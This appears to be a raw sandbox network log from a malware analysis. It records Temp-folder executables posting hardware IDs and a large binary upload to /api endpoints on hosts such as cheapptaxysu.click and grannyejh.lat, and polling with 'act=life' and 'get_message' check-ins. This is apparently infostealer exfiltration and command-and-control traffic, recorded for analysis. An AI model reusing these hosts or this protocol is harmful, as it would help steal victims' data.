                                                                                                                                                                                                                                                          Cookie: __cf_mw_byp=ycBd0i69VFeufZDq_PXg.QmfyYf0XqPyz1V3O9bUgV4-1734614430-0.0.1.1-/api
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 1271
                                                                                                                                                                                                                                                          Host: cheapptaxysu.click
                                                                                                                                                                                                                                                          2024-12-19 13:20:44 UTC1271OUTData Raw: 2d 2d 43 37 4c 4e 4e 48 30 4a 50 4b 34 4d 31 54 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 43 37 4c 4e 4e 48 30 4a 50 4b 34 4d 31 54 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 37 4c 4e 4e 48 30 4a 50 4b 34 4d 31 54 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 0d 0a 2d 2d 43 37 4c 4e 4e 48 30 4a 50 4b
                                                                                                                                                                                                                                                          Data Ascii: --C7LNNH0JPK4M1TRContent-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--C7LNNH0JPK4M1TRContent-Disposition: form-data; name="pid"1--C7LNNH0JPK4M1TRContent-Disposition: form-data; name="lid"CZJvss----C7LNNH0JPK
                                                                                                                                                                                                                                                          2024-12-19 13:20:45 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:45 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=ckvsuhmeh6l463iega2bbek9l0; expires=Mon, 14 Apr 2025 07:07:24 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6mB01kxgvgXmby1hWOqJRYILgi1nSkoMOzNV7d4%2B4Sz7WL6%2Bthx7nI7w6PyKctJKpeTCqsylLAdTKZX7l3q9tJIycbAa1pU0ZUU7yA9MlncGojom3Go6G2DQ98m20OcyBHpcDNc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b119bc1b42c9-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3141&min_rtt=1605&rtt_var=1682&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2276&delivery_rate=1819314&cwnd=127&unsent_bytes=0&cid=eecd758d92c17e15&ts=780&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:20:45 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:20:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          12192.168.2.449775104.21.67.1464435552C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:20:48 UTC370OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=WN4ZFNWEOWX38J
                                                                                                                                                                                                                                                          Cookie: __cf_mw_byp=ycBd0i69VFeufZDq_PXg.QmfyYf0XqPyz1V3O9bUgV4-1734614430-0.0.1.1-/api
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 575677
                                                                                                                                                                                                                                                          Host: cheapptaxysu.click
                                                                                                                                                                                                                                                          2024-12-19 13:20:48 UTC15331OUTData Raw: 2d 2d 57 4e 34 5a 46 4e 57 45 4f 57 58 33 38 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 57 4e 34 5a 46 4e 57 45 4f 57 58 33 38 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 4e 34 5a 46 4e 57 45 4f 57 58 33 38 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 0d 0a 2d 2d 57 4e 34 5a 46 4e 57 45 4f 57 58 33 38
                                                                                                                                                                                                                                                          Data Ascii: --WN4ZFNWEOWX38JContent-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--WN4ZFNWEOWX38JContent-Disposition: form-data; name="pid"1--WN4ZFNWEOWX38JContent-Disposition: form-data; name="lid"CZJvss----WN4ZFNWEOWX38
                                                                                                                                                                                                                                                          2024-12-19 13:20:48 UTC15331OUTData Raw: ca 27 29 80 e1 bb a1 5f d0 da b6 78 17 e8 a6 0f 67 af ec e0 b9 a0 55 3c ca 59 88 12 69 52 75 7d e0 b1 1b a2 f8 3a ab cc 70 19 28 b2 6d fb f3 65 3b 14 79 16 d5 19 a7 4c b7 17 eb 49 d4 e2 75 ce 33 31 38 49 8b 6b fb ce 1c 95 71 7b ae a4 15 e3 0f fb 78 a3 ea 36 cd b2 70 aa 3f df a7 a4 a8 ed ac e6 2c 18 44 1e 8f b9 3b b3 af 45 1b c2 ce ad bd 52 83 ca 1a 7d 13 21 37 8c c4 02 3d 09 45 ef c8 08 af 50 00 84 f2 1b 13 b6 0b 3f 9a c4 3e f1 6d e7 3c 58 c8 ac 98 47 91 7d 90 ca 1a 1b 5c d4 38 a5 84 81 67 2f 29 b7 a8 63 11 55 c8 fa fa a8 f4 f3 ce 46 89 27 e7 ab 97 67 07 f0 0e 95 07 c7 18 ca f4 9a 43 4b ac 14 9a c5 88 63 3c 58 fa f8 d5 50 0e 2c 45 8d 09 9e b4 83 3d fe 85 fd fe bf a5 9a 1a 68 10 bb c5 47 3f 03 e8 12 98 f1 60 71 e0 39 0c 68 98 54 44 4b 65 91 16 84 d8 6b 6f
                                                                                                                                                                                                                                                          Data Ascii: ')_xgU<YiRu}:p(me;yLIu318Ikq{x6p?,D;ER}!7=EP?>m<XG}\8g/)cUF'gCKc<XP,E=hG?`q9hTDKeko
                                                                                                                                                                                                                                                          2024-12-19 13:20:48 UTC15331OUTData Raw: 4f 45 f0 1e ec 64 3f 40 b5 19 30 3a 90 03 52 66 79 80 fa 84 34 da 4f d5 2c 33 91 6d 53 9a 4d fe ae c3 35 df 42 9e 9d 70 66 79 e5 36 47 f9 38 98 c6 20 65 be 38 52 71 ef ef 13 1f 8f a6 88 74 8a 7e db 38 7c 0f bc af 17 24 2d 0a 0a a6 5d 8e 09 7e 33 15 b5 94 b2 7c a5 8e 9c 0e b9 f2 1a 88 e0 85 e9 7d d7 1d aa ac 30 10 34 bd 5a ad b4 19 87 60 84 03 c2 f1 dc 38 fc c6 af 26 35 cd 0c 63 1d e9 fe 8b 5a ae b6 c1 f1 a3 d5 c5 ed f5 75 c6 61 8f 95 08 5f a0 fa 4f 20 fa 87 84 77 e9 3a 4b 02 da c7 e6 a5 28 8b 4e 42 1f 45 a2 2d 55 7c f1 6f ae 11 79 b6 bc 05 4a 71 97 7b 32 fd b1 1a 58 f0 f5 fe 13 58 75 ca 65 4d dc d0 76 36 a9 3a 20 af 62 21 22 76 10 2d a8 c7 58 a8 d9 09 67 be 77 34 9c cb c8 d0 fa 52 4f 2f f3 40 93 c9 35 d2 5e 55 df ec c3 3f 3f 5c 98 2b 6c bb fd 7a f6 71 48
                                                                                                                                                                                                                                                          Data Ascii: OEd?@0:Rfy4O,3mSM5Bpfy6G8 e8Rqt~8|$-]~3|}04Z`8&5cZua_O w:K(NBE-U|oyJq{2XXueMv6: b!"v-Xgw4RO/@5^U??\+lzqH
                                                                                                                                                                                                                                                          2024-12-19 13:20:48 UTC15331OUTData Raw: 03 c5 19 76 35 c5 35 5e 47 8e 69 62 1c a5 34 56 e3 0e 05 74 bc 00 e4 03 5b b2 0b 79 83 fe 73 26 e9 97 91 00 fb 52 9c 67 37 23 7a 7b 99 66 45 b3 15 05 2f d6 96 89 f3 41 ae ef ff 4c 7f 32 10 38 a8 56 38 22 57 38 2c fe f8 ae 28 8e db 7f 8d b6 e7 48 4e df 53 d7 dd 03 0a 7c 6f 4b f5 1b c4 f9 06 f6 92 3e 85 f2 cb 9c a0 59 c7 e7 16 f6 c6 6c b5 4b 5e bb 5d f7 fa 9d 65 d8 38 b1 d8 18 0a 7e 59 c1 18 ec af 3d b3 0a 91 bb 00 fd ce 3e 69 3d a5 7d 98 c1 a9 df 5c 61 a7 35 45 92 8e 04 c5 ae 6b 6e 8f 0c 70 41 ea 06 ec 40 04 58 ff e7 45 e5 61 04 15 75 ff a3 97 56 03 38 7e f1 d7 d9 f1 cb a1 c4 c2 f7 b8 5d 8f cf f9 0c 43 fd 81 2d 01 cc a6 bd 07 ab a5 80 db 45 7a 57 13 54 f4 83 68 56 81 23 f3 7f df 9d db 15 d0 d5 f4 1f e3 5b 30 d9 9b 29 2d d8 f4 ff 61 52 79 b4 4d 92 0a 5d fd
                                                                                                                                                                                                                                                          Data Ascii: v55^Gib4Vt[ys&Rg7#z{fE/AL28V8"W8,(HNS|oK>YlK^]e8~Y=>i=}\a5EknpA@XEauV8~]C-EzWThV#[0)-aRyM]
                                                                                                                                                                                                                                                          2024-12-19 13:20:48 UTC15331OUTData Raw: bd 07 f4 39 87 ff cd b4 89 25 0a db 8a 05 e5 ec 43 31 3d 40 01 3e e7 07 ff 3e 72 13 9c e9 e8 cd 09 24 51 e6 c4 b6 12 7e 17 d8 75 19 b9 12 da fa 23 9d 74 a2 cf cf 51 f9 3a 7e 2c c1 98 77 3a 73 ab a9 84 e9 f1 c4 12 3b 33 d9 f4 35 ee df 61 fa f9 a5 d4 13 f4 84 79 d8 8d 91 03 bb 76 a1 2c 2f 3f c0 1e 89 fc 5f a4 0d 7b 48 8d 79 bb 9c e5 33 eb f3 73 6b 79 d9 fd d1 62 99 81 e0 dc 5f 4a 05 c0 3b f1 dd 9b 54 c0 21 cf da 45 7a 46 e4 fc 11 8f 57 39 2e 9b a2 77 90 74 36 83 b0 2b 5b 1d 36 18 1c 3a fe 4f 83 fe df 05 7e 6d 8f ef 68 bb 73 88 43 ff 9d b8 b3 05 c0 57 11 f6 0e 39 5d f7 a9 62 13 cf 7f 03 be d9 b6 7f 75 60 67 60 d7 f6 b0 14 44 7e 3b 76 95 ac dc b0 35 6c 3c c7 8d ba 7d 56 47 5e 96 a2 2d e6 e1 44 09 bb 9f 20 9b f1 e7 c2 f4 1a ef 37 9e c8 46 98 1d 2f 78 a9 d2 35
                                                                                                                                                                                                                                                          Data Ascii: 9%C1=@>>r$Q~u#tQ:~,w:s;35ayv,/?_{Hy3skyb_J;T!EzFW9.wt6+[6:O~mhsCW9]bu`g`D~;v5l<}VG^-D 7F/x5
                                                                                                                                                                                                                                                          2024-12-19 13:20:48 UTC15331OUTData Raw: e4 22 05 7a a2 d6 d2 15 d1 0c 9b 08 16 19 30 ae 2a d1 fe 78 d2 e7 08 55 d4 93 c6 12 90 9b 5a 56 c1 cd a3 da 08 f7 42 d9 ec 07 ea 86 4e f7 53 7d ac 57 8e 7c 00 be 9f 0f 53 a7 f2 2a b7 d7 65 de 97 0c f3 97 45 cf c4 a1 9b 99 eb f6 75 ae 3a 20 61 f5 dd c8 08 74 b5 b1 d7 5e 0f 3d 7f ba 29 1a 64 a1 43 e6 75 ba e9 e6 77 a9 93 40 7d 0f d4 32 8b 28 db 09 80 e1 44 89 af 9f 96 de 9a 41 b6 16 33 b2 f1 72 d2 b6 93 7f d3 df b5 2f 32 01 35 fa 83 eb d9 c8 e7 d5 b8 79 5e b9 e0 6d 36 1e 23 7b 6b 36 27 7d 2d b5 d5 e3 33 2e f1 6b 41 81 e4 6c 3b 52 7d 48 2f a7 73 bf d5 3d 6a 30 7c 86 89 06 cd 25 9c 89 5f bb ea 5c 6f 4a ce 89 08 57 c9 a4 9e 57 89 21 07 8d 08 52 bf c0 a7 e7 ee 45 dc 14 db c0 b2 5b 7f 21 60 6d 2c 22 ab 08 8c ea 6f ea c9 35 eb f2 be 57 58 c6 07 9c 22 f7 44 05 5b
                                                                                                                                                                                                                                                          Data Ascii: "z0*xUZVBNS}W|S*eEu: at^=)dCuw@}2(DA3r/25y^m6#{k6'}-3.kAl;R}H/s=j0|%_\oJWW!RE[!`m,"o5WX"D[
                                                                                                                                                                                                                                                          2024-12-19 13:20:48 UTC15331OUTData Raw: d6 91 02 73 80 83 ee ea f9 e0 e3 5a 34 be f6 a3 65 c3 64 e3 df 31 4a f8 cd bf fe 5d 99 e9 9b 64 6e 76 56 f2 36 f8 e3 e8 fd dc 51 de 9e 57 a1 cb 5c 41 10 7d 25 50 41 e5 84 2a f8 bc 48 75 40 6c b4 73 80 fd fd e8 d5 37 82 60 e6 2a 0e 30 6f f1 a2 dc cf 72 48 11 02 25 21 44 bd 8f 80 95 e4 c4 07 9f 9e be c3 3b dd db 29 36 d5 80 85 3b c3 fd 8e 03 ea d8 18 1a 96 4d 2f 06 c9 13 1a 78 af c6 79 73 4e 90 ed ca 95 18 95 6b af 2e 11 a5 d1 5f 7f 6d 94 bf f2 7b ff aa f1 47 cb 67 f4 ad de b0 75 23 0a 5f a8 80 f0 a1 e2 98 b8 a7 eb 4f a4 d7 35 c2 3f fc f5 f4 dd c4 7c b8 86 89 ee 3e 1e ac 26 26 f3 b0 b0 f5 a5 49 88 d5 ae 15 43 ff ad 71 57 39 a0 80 bb 19 98 f6 37 94 7d 0c 3b df 7f b0 ed 00 e0 fc 1e b1 f8 5f 0d a0 f4 60 eb 6c 82 00 e2 69 68 35 ad 39 0c 03 75 54 44 36 db 47 4d
                                                                                                                                                                                                                                                          Data Ascii: sZ4ed1J]dnvV6QW\A}%PA*Hu@ls7`*0orH%!D;)6;M/xysNk._m{Ggu#_O5?|>&&ICqW97};_`lih59uTD6GM
                                                                                                                                                                                                                                                          2024-12-19 13:20:48 UTC15331OUTData Raw: 19 bf 04 8f d1 a4 bf 99 c1 00 22 51 be d1 88 64 b0 62 8f 10 e7 7b de 99 66 47 88 42 da 12 34 80 b0 8b 77 50 54 26 1c 24 50 1e 02 1b 45 1a 06 f8 af e2 21 17 89 81 db 59 da 3b ce ee 30 cb ce 2c e7 48 80 db b4 dd ac ce 7d 39 ef 19 1f d6 c3 6f a5 2f 0c 7d 78 4d 9e de b0 8d c9 a4 da 8d 6d 76 62 ab 7f 5b ba d1 f7 6d 57 00 fc f7 ca 08 9a 0b cb 7c 00 94 1e c8 24 35 98 a4 fa de a9 21 54 10 76 90 9b 0b 6c 54 6a 75 b9 96 20 b9 66 89 b9 0b 8d 7e 3f 99 54 04 64 79 df ef 1f 65 ae 2c 8a 0d 03 26 58 21 20 6f fb 6d 42 6c 65 81 96 aa d2 3b 9b d6 4e d4 29 f1 ad 23 42 37 4e e3 12 ac 4c 14 c4 a0 46 fd b4 b0 7e 94 76 8e cf 90 04 e8 b8 55 60 c0 d2 00 67 f4 8e c5 36 a9 16 9a 58 04 e2 47 6a a6 f6 76 ac d3 c4 d0 cf 7a f2 cf e6 8a 63 85 20 7f e2 b8 70 df 22 4e 48 b0 d3 c7 3d 5c c9
                                                                                                                                                                                                                                                          Data Ascii: "Qdb{fGB4wPT&$PE!Y;0,H}9o/}xMmvb[mW|$5!TvlTju f~?Tdye,&X! omBle;N)#B7NLF~vU`g6XGjvzc p"NH=\
                                                                                                                                                                                                                                                          2024-12-19 13:20:48 UTC15331OUTData Raw: 97 4c 41 63 c4 ba b3 01 17 8d 59 e7 ee a7 e9 05 a0 c8 15 f6 94 a4 cd ec df 27 aa 07 44 80 d5 01 d2 cc ff 39 ce 96 a4 80 cb c0 fe c2 43 3b ff f5 d7 d8 4e 14 df 94 a3 fb 78 a0 94 22 2f 0a eb bd d1 44 9e 95 be 78 85 d1 15 61 24 e3 38 c6 3d 14 b6 ae 4b 24 52 c8 7f 2b 7a 19 6f 59 1f b2 72 87 da ee 14 7c f9 1d 3d 2c 7e 24 4a a6 08 ce 69 31 d5 13 e5 b0 e9 27 cb f2 43 d4 bb 15 4a 91 43 2d 09 6f d5 75 5f fb af cb 3b 6f 13 01 1e c6 6f b7 26 27 73 bf 42 0c 75 f3 50 a0 f7 10 50 32 d3 aa 3b ab ca b5 30 d7 44 11 b6 f3 09 3b 09 ef 2e d2 01 ad 8a b4 d5 7c f3 f7 51 d3 76 d0 20 96 28 ba 97 44 27 2a b8 6d 6a b9 d5 42 83 9f d1 de aa 6b 36 e7 32 a5 a8 1f 23 a8 b7 ee 30 44 09 b8 9f db 13 31 a4 0b 30 e0 10 93 61 00 4f 01 59 50 58 2a 4f 3a 9c fc 1c 4a 5e 24 50 ba 22 bf f4 78 bf
                                                                                                                                                                                                                                                          Data Ascii: LAcY'D9C;Nx"/Dxa$8=K$R+zoYr|=,~$Ji1'CJC-ou_;oo&'sBuPP2;0D;.|Qv (D'*mjBk62#0D10aOYPX*O:J^$P"x
                                                                                                                                                                                                                                                          2024-12-19 13:20:48 UTC15331OUTData Raw: d2 9c 1e 54 1d 95 62 f5 3f 2c 3c 21 12 fa 09 62 5a 23 c0 a6 7d 31 1a 0f 77 81 b6 e2 60 29 96 56 a1 82 21 26 f4 c2 ca 3e 47 ba e5 f3 87 55 31 d2 0b 1d 74 78 05 0c cb 6d 01 29 b9 78 fc 0e c9 2d 32 9e e8 f6 1b a3 f7 b4 0a 7a 9c 43 f6 86 ac fd 4e 2a 34 53 0c 3e 50 11 fa ed ef 0c af 03 81 08 44 82 5d 6f be 96 a2 80 c5 37 d8 2e dd 85 4b d1 1b f8 54 fe 8f f4 ab 02 af ec 41 79 10 f8 c2 19 b0 6c 47 1c 2f f3 4c 01 b3 17 e3 d5 25 b9 19 80 03 7c bc 63 44 ea 15 6e 88 e2 e6 5a 70 84 cd ac b2 e4 3d c7 a2 2e 2d 21 24 bf b0 6a ff c8 48 da 3d 81 78 d5 b0 9e 36 91 9c af b4 5d 69 72 b1 c9 a4 d7 1a 28 3e 4c d8 f9 d5 2e 47 a9 aa fe 03 2a 24 5d 8c da f5 4f d9 07 0f f7 26 45 d0 fe 93 89 ac 90 06 39 e1 e3 af 23 de 20 c0 1e 54 ce 3d a3 2d 7c a0 99 02 d3 10 7a 2a 93 3c cf 55 b9 b5
                                                                                                                                                                                                                                                          Data Ascii: Tb?,<!bZ#}1w`)V!&>GU1txm)x-2zCN*4S>PD]o7.KTAylG/L%|cDnZp=.-!$jH=x6]ir(>L.G*$]O&E9# T=-|z*<U
                                                                                                                                                                                                                                                          2024-12-19 13:20:51 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:51 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=3ro2kl8o8bbmurmam9p8q3cp7d; expires=Mon, 14 Apr 2025 07:07:29 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BUYhS4lhBLrhvmxFO0oB1Q%2FLzWE8MDNJvNt2234bYPhgbH1vkhzhkNehm6o4HBCmZJohFmWV3bbiUYM45aDr8dL%2F2OIGuaD96Cr9D56lj2V2m6jYITnCeXtwQDQW8vw8U1dFqKc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b12d4d25437f-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7715&min_rtt=7715&rtt_var=3857&sent=205&recv=599&lost=0&retrans=1&sent_bytes=4226&recv_bytes=578333&delivery_rate=102366&cwnd=79&unsent_bytes=0&cid=2efa4e42356757eb&ts=3320&x=0"


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          13192.168.2.449780104.21.67.1464435552C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:20:52 UTC355OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Cookie: __cf_mw_byp=ycBd0i69VFeufZDq_PXg.QmfyYf0XqPyz1V3O9bUgV4-1734614430-0.0.1.1-/api
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 77
                                                                                                                                                                                                                                                          Host: cheapptaxysu.click
                                                                                                                                                                                                                                                          2024-12-19 13:20:52 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 5a 4a 76 73 73 2d 2d 26 6a 3d 26 68 77 69 64 3d 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=CZJvss--&j=&hwid=4D9AEFC7455232ACAC8923850305D13E
                                                                                                                                                                                                                                                          2024-12-19 13:20:53 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:20:53 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=fie5u5p4rtk06u4g036k1m3bsc; expires=Mon, 14 Apr 2025 07:07:32 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cxqf0lsv5jbDf3nK%2Fq4Fi9gghQbqQXz2CuVUJRoZHL3VUCTef30j22%2BljyKL3u8zjtg78OrqOXEl9TF9XB5K74w%2Bf%2FXZROm4kPOXNzDY2LdiHD4TOGHg52JqAQZpughQK5V6YSo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47b14a6a6fc33c-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1500&rtt_var=623&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1068&delivery_rate=1946666&cwnd=144&unsent_bytes=0&cid=3a68d7318c00371a&ts=784&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:20:53 UTC54INData Raw: 33 30 0d 0a 36 5a 6d 52 42 37 43 73 57 58 6f 36 67 6d 46 6c 62 2b 4e 43 5a 50 72 75 71 68 6b 39 47 53 69 2b 4e 39 53 52 30 50 47 4a 5a 41 43 79 78 41 3d 3d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 306ZmRB7CsWXo6gmFlb+NCZPruqhk9GSi+N9SR0PGJZACyxA==
                                                                                                                                                                                                                                                          2024-12-19 13:20:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          14192.168.2.449834104.21.64.804435812C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:21:14 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:21:14 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                                          2024-12-19 13:21:14 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:14 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=1v832durgjoo0134rsi7rmrd7g; expires=Mon, 14 Apr 2025 07:07:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
